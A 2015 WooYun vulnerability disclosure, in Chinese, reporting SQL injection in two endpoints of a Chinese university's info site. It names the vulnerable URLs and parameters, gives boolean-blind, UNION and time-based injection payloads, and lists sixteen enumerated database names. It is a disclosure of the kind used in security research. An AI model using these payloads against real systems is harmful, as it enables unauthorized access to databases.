当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149394

漏洞标题:西南财经大学 sql注入漏洞

相关厂商:西南财经大学

漏洞作者: 人丑嘴不甜

提交时间:2015-10-26 10:55

修复时间:2015-12-10 11:02

公开时间:2015-12-10 11:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

西南财经大学 sql注入漏洞 差两个rank 原谅我...........

详细说明:

注入点1
http://info.swufe.edu.cn/vlc/?id=1'%22&wall=1
id注入
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-1392' OR (8224=8224)#&wall=1
Type: UNION query
Title: MySQL UNION query (random number) - 7 columns
Payload: id=-5979' UNION ALL SELECT 7629,7629,CONCAT(0x7178617371,0x674f6a676a5a4a417347,0x7179696171),7629,7629,7629,7629#&wall=1
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: id=-3429' OR 3258=SLEEP(5) AND 'ZFYM'='ZFYM&wall=1
---
注入点2
info.swufe.edu.cn/netinfo/everyday/index.asp
post注入
button=%cc%e1%bd%bb&begintime=1&endtime=1&uid= 里面的uid
available databases [16]:
[*] aclm_db
[*] config_db
[*] ead
[*] etl
[*] icc_db
[*] invent_db
[*] master
[*] model
[*] monitor_db
[*] msdb
[*] perf_db
[*] report_db
[*] reportplat_db
[*] syslog_db
[*] tempdb
[*] vlanm_db

漏洞证明:

QQ图片20151024213945 (2).png

QQ图片20151024213945.png

QQ图片20151024215000.png

修复方案:

谢谢 您的rank

版权声明:转载请注明来源 人丑嘴不甜@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-10-26 11:01

厂商回复:

谢谢!

最新状态:

暂无